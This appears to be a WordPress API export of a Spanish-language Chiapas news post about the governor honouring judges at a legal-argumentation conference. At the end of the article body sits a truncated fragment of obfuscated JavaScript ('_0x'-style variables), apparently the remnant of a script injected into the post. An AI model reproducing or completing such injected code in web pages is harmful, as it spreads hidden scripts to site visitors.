{"id":311,"date":"2022-03-08T04:13:21","date_gmt":"2022-03-08T04:13:21","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=311"},"modified":"2022-03-08T04:13:22","modified_gmt":"2022-03-08T04:13:22","slug":"gobernador-reconoce-a-juezas-y-jueces-por-abonar-a-la-paz-social-al-respeto-y-la-democracia","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=311","title":{"rendered":"Gobernador reconoce a juezas y jueces por abonar a la paz social, al respeto y la democracia"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"637\" data-id=\"312\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220307-WA0201-1024x637.jpg\" alt=\"\" class=\"wp-image-312\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220307-WA0201-1024x637.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220307-WA0201-300x187.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220307-WA0201-768x478.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220307-WA0201.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"600\" data-id=\"315\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220307-WA0199-1024x600.jpg\" alt=\"\" class=\"wp-image-315\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220307-WA0199-1024x600.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220307-WA0199-300x176.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220307-WA0199-768x450.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220307-WA0199.jpg 1095w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"660\" data-id=\"313\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220307-WA0203-1024x660.jpg\" alt=\"\" class=\"wp-image-313\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220307-WA0203-1024x660.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220307-WA0203-300x193.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220307-WA0203-768x495.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220307-WA0203.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"643\" data-id=\"314\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220307-WA0205-1024x643.jpg\" alt=\"\" class=\"wp-image-314\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220307-WA0205-1024x643.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220307-WA0205-300x188.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220307-WA0205-768x482.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220307-WA0205.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>\u2022&nbsp;&nbsp;&nbsp; En el D\u00eda del Juzgador Mexicano realizan la Conferencia \u201cTeor\u00eda de la Argumentaci\u00f3n Jur\u00eddica\u201d a cargo del presidente de la Barra Interamericana de Abogados, Rub\u00e9n Pacheco Incl\u00e1n<\/p>\n\n\n\n<p>\u2022&nbsp;&nbsp;&nbsp; Buscan fortalecer habilidades y conocimientos de juezas, jueces y trabajadores en el \u00e1mbito jurisdiccional<\/p>\n\n\n\n<p>07 de Marzo del 2022. En el marco del D\u00eda del Juzgador Mexicano, el Poder Judicial del Estado de Chiapas a trav\u00e9s del Instituto de Formaci\u00f3n, Profesionalizaci\u00f3n y Carrera Judicial realiz\u00f3 la Conferencia \u201cTeor\u00eda de la Argumentaci\u00f3n Jur\u00eddica\u201d, a cargo del presidente de la Barra Interamericana de Abogados, Rub\u00e9n Pacheco Incl\u00e1n, con la finalidad de fortalecer habilidades, conocimientos y destrezas de servidoras y servidores p\u00fablicos, y sociedad en general.<\/p>\n\n\n\n<p>Al asistir como invitado a esta conferencia, el gobernador Rutilio Escand\u00f3n Cadenas se\u00f1al\u00f3 que el bienestar es fruto de la justicia, la verdad y el respeto hacia las personas, por ello, afirm\u00f3 que sin las juezas, jueces y las y los trabajadores en el \u00e1mbito jurisdiccional, no se podr\u00eda gozar de paz social, respeto y democracia.<\/p>\n\n\n\n<p>En este sentido, expres\u00f3 su reconocimiento a las y los juzgadores por su desempe\u00f1o en la impartici\u00f3n de justicia que, dijo, es complejo en un estado como Chiapas con una poblaci\u00f3n diversa, usos y costumbres, tradiciones y diferentes lenguas, pero tambi\u00e9n lo hace m\u00e1s intenso, interesante y convoca a hacer un mayor esfuerzo para estar dentro de las expectativas del pueblo.<\/p>\n\n\n\n<p>El mandatario puntualiz\u00f3 que la capacitaci\u00f3n y argumentaci\u00f3n dan mayor objetividad, transparencia y plenitud para fortalecer la autonom\u00eda e independencia del Poder Judicial, el cual se ha reformado a fin de darle m\u00e1s autenticidad y reconocimiento a este trabajo, sin que se nombre a las y los magistrados, jueces o consejeros a discreci\u00f3n, sino por su formaci\u00f3n judicial, con el objetivo de que tengan los conocimientos, actitud y vocaci\u00f3n de servir.<\/p>\n\n\n\n<p>Durante su ponencia, Rub\u00e9n Pacheco Incl\u00e1n mencion\u00f3 que la argumentaci\u00f3n es un tema relevante porque no s\u00f3lo est\u00e1 en el quehacer de los juristas, sino a cada paso, pues es la posibilidad de expresar, proyectar y transmitir la intenci\u00f3n del lenguaje. Enfatiz\u00f3 que el objetivo de esta disertaci\u00f3n es establecer elementos centrales para desarrollar una teor\u00eda est\u00e1ndar de la argumentaci\u00f3n.<\/p>\n\n\n\n<p>Refiri\u00f3 que M\u00e9xico trabaja por mejorar los sistemas de justicia y esquemas de seguridad jur\u00eddica, al tiempo de destacar la relevancia de la capacitaci\u00f3n y el aprendizaje, como se hace en este caso al reconocer la importancia de la estructura argumentativa con elementos epistemol\u00f3gicos y con metodolog\u00eda que amalgame criterios de l\u00f3gica, hermen\u00e9utica, racionalidad y filosof\u00eda.&nbsp;<\/p>\n\n\n\n<p>Por su parte, el Tribunal Superior de Justicia y el Consejo de la Judicatura explic\u00f3 que para seguir fortaleciendo al Poder Judicial del Estado, se llev\u00f3 a cabo esta conferencia y se abrieron mesas de trabajo con la intenci\u00f3n de intercambiar, enriquecer y solventar dudas, no s\u00f3lo a jueces, sino a todos aquellos quienes intervienen.&nbsp;<\/p>\n\n\n\n<p>Agreg\u00f3 que se ha trabajado en la capacitaci\u00f3n del personal con perspectiva de g\u00e9nero, brindando oportunidades para que las mujeres tengan m\u00e1s participaci\u00f3n en la toma de decisiones.<\/p>\n\n\n\n<p>Las y los juzgadores resaltaron que el juzgador es la instancia m\u00e1s cercana al pueblo con respecto a la impartici\u00f3n de justicia, por lo que al recordar la instauraci\u00f3n del Supremo Tribunal de Justicia de la Am\u00e9rica Mexicana por Jos\u00e9 Mar\u00eda Morelos y Pav\u00f3n, se eleva su labor a favor de las causas m\u00e1s sensibles, y exalta la necesidad de que en el pa\u00eds se cuente con m\u00e1s juezas y jueces dotados de independencia en sus fallos, autonom\u00eda en su deliberaci\u00f3n y soberan\u00eda en su devenir.<\/p>\n\n\n\n<p>Asistieron: representantes de la Coordinaci\u00f3n de Jueces Federales del Poder Judicial de la Federaci\u00f3n, del Juzgado III del Ramo Civil en Tuxtla Guti\u00e9rrez, del Congreso del Estado y de la Fiscal\u00eda General del Estado, entre otros.&nbsp;<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u2022&nbsp;&nbsp;&nbsp; En el D\u00eda del Juzgador Mexicano realizan la Conferencia \u201cTeor\u00eda de la Argumentaci\u00f3n Jur\u00eddica\u201d a cargo del presidente de la Barra Interamericana de Abogados, Rub\u00e9n Pacheco Incl\u00e1n \u2022&nbsp;&nbsp;&nbsp; Buscan fortalecer habilidades y conocimientos de juezas, jueces y trabajadores en el \u00e1mbito jurisdiccional 07 de Marzo del 2022. En el marco del D\u00eda del Juzgador &hellip;<\/p>\n","protected":false},"author":2,"featured_media":312,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-311","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/311","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=311"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/311\/revisions"}],"predecessor-version":[{"id":316,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/311\/revisions\/316"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/312"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=311"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=311"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=311"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}